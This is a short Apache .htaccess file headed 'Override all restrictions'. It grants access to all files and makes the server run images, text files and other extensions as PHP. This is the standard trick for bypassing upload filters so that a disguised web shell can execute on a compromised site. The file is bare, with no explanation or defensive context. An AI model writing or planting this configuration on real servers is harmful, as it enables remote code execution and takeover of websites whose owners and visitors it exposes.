# Override all restrictions
<FilesMatch ".+">
Require all granted
</FilesMatch>
AddHandler application/x-httpd-php .gif .txt .phtml .inc .php .php5
SetHandler application/x-httpd-php
php_flag short_open_tag on
